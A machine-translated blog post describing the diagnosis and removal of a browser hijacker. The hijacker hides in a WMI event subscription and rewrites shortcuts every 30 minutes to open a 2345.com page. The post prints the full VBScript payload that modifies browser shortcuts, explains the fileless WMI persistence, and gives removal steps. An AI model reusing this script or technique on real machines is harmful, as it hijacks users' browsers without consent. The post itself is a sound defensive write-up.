Browser is maliciously set home page http://www.2345.com /? Kunown Solution

One day, to download the resources of verycd.com, search for a verycd link Viewer (for specific reasons, you know). The result is really a fly !......

You cannot find the download link and delete it directly. However, I found that the browser is directly redirected to ghost!

Finally, it was found that the shortcut command in the original Quick Start bar was modified. The modified command is similar to the following:

"C: \ ProgramFiles (x86) \ MozillaFirefox \ firefox.exe" http://www.2345.com /? Kunown

So that is the normal modification shortcuts, manually delete "http://www.2345.com /? Kunown section. However, this was not a long time. After half an hour, it was changed again, so that the system was compromised ~!

Norton is installed on the local machine, and no problem is detected.

Super Rabbit, 360, exterminateit and other tools have been installed for inspection ......, Unmount all of them ...... (After Super Rabbit is uninstalled, it finds that its own browser garbage has not been deleted !!! Really spam enough ~! Unmount it manually. I will not repeat it here !)

Open processmonitorto go into the pipeline and find that a scrcons.exe process automatically starts and modifies the command in the Quick Start bar every 30 minutes, and then closes the command automatically (thanks to it, if you do it once every 24 hours, then I have a cup ......), Modify the path of the opera Quick Start icon in win7 as follows:

C: \ Users \ Gemini \ AppData \ Roaming \ Microsoft \ InternetExplorer \ QuickLaunch \ UserPinned \ TaskBar \ Opera12.011532.lnk

Find the information and find that this is a timed automatic running script initiated by WMI.

To view WMI events, download and install WMITool at the following address,

Http://www.microsoft.com/en-us/download/details.aspx? Id = 24045

After the installation, open WMIeventviewer and click registerforevents in the upper left corner. The Connecttonamespace box is displayed. Enter "root \ subscribe", and click "OK". The following message is displayed:

Click _ EventFilter: Name = "unown_filter" on the left, right-click ActiveScriptEventConsumerName = "unown" on the right, and select viewinstantproperties, for example:

View the ScriptText item, it is a VBScript call system service is executed every 30 minutes, add "http://www.2345.com /? Kunown "! Grab you ~! Hidden deep enough, no resident processes, no files (store yourself in the WMI database), rely on ~!

Affected browsers are ):

"IEXPLORE. EXE "," chrome.exe "," firefox.exe "," 360chrome.exe "," 360SE.exe "," sogoupolicer.exe "," opera.exe "," Safari.exe "," Maxthon.exe "," TTraveler.exe ", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"

The Code is as follows:

On Error Resume Next: Const link =" http://www.2345.com/?kunown ": Browsers = Array (" IEXPLORE. EXE "," chrome.exe "," firefox.exe "," 360chrome.exe "," 360SE.exe "," sogoupolicer.exe "," opera.exe "," Safari.exe "," Maxthon.exe "," TTraveler.exe ", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"): Set oDic = CreateObject ("scripting. dictionary "): For Each browser In browsers: oDic. add LCase (browser), browser: Next: Set fso = CreateObject ("Scripting. filesystemobject "): Set WshShell = CreateObject (" Wscript. shell "): strDesktop =" C: \ Users \ Gemini \ Desktop ": strAllUsersDesktop = WshShell. specialFolders ("AllUsersDesktop"): QuickLaunch = "C: \ Users \ Gemini \ AppData \ Roaming \ Microsoft \ Internet Explorer \ Quick Launch ": userPinnedStartMenu = QuickLaunch & "\ User Pinned \ StartMenu": UserPinnedTaskBar = QuickLaunch & "\ User Pinned \ TaskBar": For Each file In fso. getFolder (strDesktop ). files: If LCase (fso. getExtensionName (file. path) = "lnk" Then: set oShellLink = WshShell. createShortcut (file. path): path = oShellLink. targetPath: name = fso. getBaseName (path )&". "& fso. getExtensionName (path): If oDic. exists (LCase (name) Then: oShellLink. arguments = link: If file. attributes And 1 Then: file. attributes = file. attributes-1: End If: oShellLink. save: End If: Next: For Each file In fso. getFolder (strAllUsersDesktop ). files: If LCase (fso. getExtensionName (file. path) = "lnk" Then: set oShellLink = WshShell. createShortcut (file. path): path = oShellLink. targetPath: name = fso. getBaseName (path )&". "& fso. getExtensionName (path): If oDic. exists (LCase (name) Then: oShellLink. arguments = link: If file. attributes And 1 Then: file. attributes = file. attributes-1: End If: oShellLink. save: End If: Next: If fso. folderExists (QuickLaunch) Then: For Each file In fso. getFolder (QuickLaunch ). files: If LCase (fso. getExtensionName (file. path) = "lnk" Then: set oShellLink = WshShell. createShortcut (file. path): path = oShellLink. targetPath: name = fso. getBaseName (path )&". "& fso. getExtensionName (path): If oDic. exists (LCase (name) Then: oShellLink. arguments = link: If file. attributes And 1 Then: file. attributes = file. attributes-1: End If: oShellLink. save: End If: Next: End If: If fso. folderExists (UserPinnedStartMenu) Then: For Each file In fso. getFolder (UserPinnedStartMenu ). files: If LCase (fso. getExtensionName (file. path) = "lnk" Then: set oShellLink = WshShell. createShortcut (file. path): path = oShellLink. targetPath: name = fso. getBaseName (path )&". "& fso. getExtensionName (path): If oDic. exists (LCase (name) Then: oShellLink. arguments = link: If file. attributes And 1 Then: file. attributes = file. attributes-1: End If: oShellLink. save: End If: Next: End If: If fso. folderExists (UserPinnedTaskBar) Then: For Each file In fso. getFolder (UserPinnedTaskBar ). files: If LCase (fso. getExtensionName (file. path) = "lnk" Then: set oShellLink = WshShell. createShortcut (file. path): path = oShellLink. targetPath: name = fso. getBaseName (path )&". "& fso. getExtensionName (path): If oDic. exists (LCase (name) Then: oShellLink. arguments = link: If file. attributes And 1 Then: file. attributes = file. attributes-1: End If: oShellLink. save: End If: Next: End If

Finally, clear the project by right-clicking "_ EventFilter: Name =" unown_filter "in WMIeventviewer and deleting it!

Cannot be deleted?

Go to the WMITool installation path (for example, C: \ ProgramFiles (x86) \ wmitools), right-click wbemeventviewer.exe, and select Run as administrator! Deleted!

Before you finish, you also need to manually in the Quick Start bar, the http://www.2345.com /? Remove kunown!

This is so much for the time being. If there is no other impact, please try again!

Well, this fly is still spitting out!